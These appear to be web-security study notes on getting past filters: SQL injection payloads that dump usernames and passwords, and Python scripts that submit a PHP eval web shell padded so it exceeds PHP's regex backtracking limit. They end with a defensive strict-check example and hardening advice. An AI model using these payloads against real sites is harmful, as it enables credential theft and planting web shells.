1. Bypass
?id=1' and 1=2 order by 3--+
?id=1%27%20and%201=2%20order%20by%203--+
1e1from
MySQL scientific notation: writing 1e1 directly in front of from (1e1from) leaves no word boundary before from, so a filter that relies on \b does not match it.
?id=-1' union select 1,group_concat(username,0x3a,password),1e1from users--++
?id=-1%27%20union%20select%201,group_concat(username,0x3a,password),1e1from%20users--+
2. Bypassing the backtracking limit
PHP's PCRE backtracking limit: roughly 100,000 Chinese characters or 1,000,000 ASCII characters exhaust it.
Insert 1,000,000 characters to exceed the backtracking limit.
import requests

# Form field: the payload followed by one million 'a' characters, enough to push
# the server-side preg_match() past pcre.backtrack_limit so it returns false
# instead of reporting a match.
files = {
    'file': 'aaa<?php eval($_POST[txt]);//' + 'a' * 1000000
}
res = requests.post('http://127.0.0.1/index.php', data=files)
print(res.headers)
3. Use strict comparison when checking the match result: !== is strict inequality, so a value of a different type is always unequal.
4. Exploiting backtracking to bypass the limit
import requests

# Form field: the expected greeting followed by 100,000 'a' characters to push
# the server-side regex past its backtracking limit.
datas = {
    'greeting': 'MerryChristmas' + 'a' * 100000
}
res = requests.post('http://127.0.0.1/demo4.php', data=datas)
print(res.headers)
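The server side of sections 2 to 4, as an added example that is not part of the original notes: a loose preg_match() check that treats the error value false like "no match", next to the strict check from section 3 that fails closed. The filter pattern, the function names and the lowered pcre.backtrack_limit are assumptions made so the effect can be reproduced locally without a 1 MB request; the padded input is constructed for the demo.

```php
<?php
// Added example, not code from the original notes. Shows why a regex filter in
// PHP must distinguish preg_match() returning false (PCRE error, e.g. the
// backtracking limit was exceeded) from returning 0 (no match).

// Hypothetical filter pattern: flag PHP open tags followed by a call or
// statement terminator. The greedy ".*" before the character class is what
// forces PCRE to backtrack across every byte of trailing padding.
const FILTER_PATTERN = '/<\?.*[(`;?>].*/is';

// Loose check (vulnerable): "== 0" is true for both 0 and false, so a PCRE
// error is silently treated as "clean input".
function filter_loose(string $input): bool
{
    return preg_match(FILTER_PATTERN, $input) == 0;
}

// Strict check (hardened): compare with === and fail closed on any PCRE error.
// Returns true only when the engine completed and found no match.
function filter_strict(string $input): bool
{
    $r = preg_match(FILTER_PATTERN, $input);
    if ($r === false || preg_last_error() !== PREG_NO_ERROR) {
        // The engine gave up; the input has not actually been inspected.
        error_log('preg_match failed, PCRE error code ' . preg_last_error());
        return false;
    }
    return $r === 0;
}

// Constructed sample: the same shape as the payload in section 2, but the
// limit is lowered for the demo instead of sending one million characters.
ini_set('pcre.backtrack_limit', '1000');
$padded = '<?php eval($_POST[txt]);//' . str_repeat('a', 100000);
$plain  = 'hello world';

var_dump(filter_loose($plain));    // bool(true)  -> allowed
var_dump(filter_strict($plain));   // bool(true)  -> allowed
var_dump(filter_loose($padded));   // bool(true)  -> error mistaken for "no match"
var_dump(filter_strict($padded));  // bool(false) -> rejected, error logged
```

Besides the strict comparison, a practical hardening is to cap the accepted input length before running any regex on it and to monitor the log for PREG_BACKTRACK_LIMIT_ERROR (code 2): a sudden run of those entries is a reliable signal that someone is padding requests against the filter.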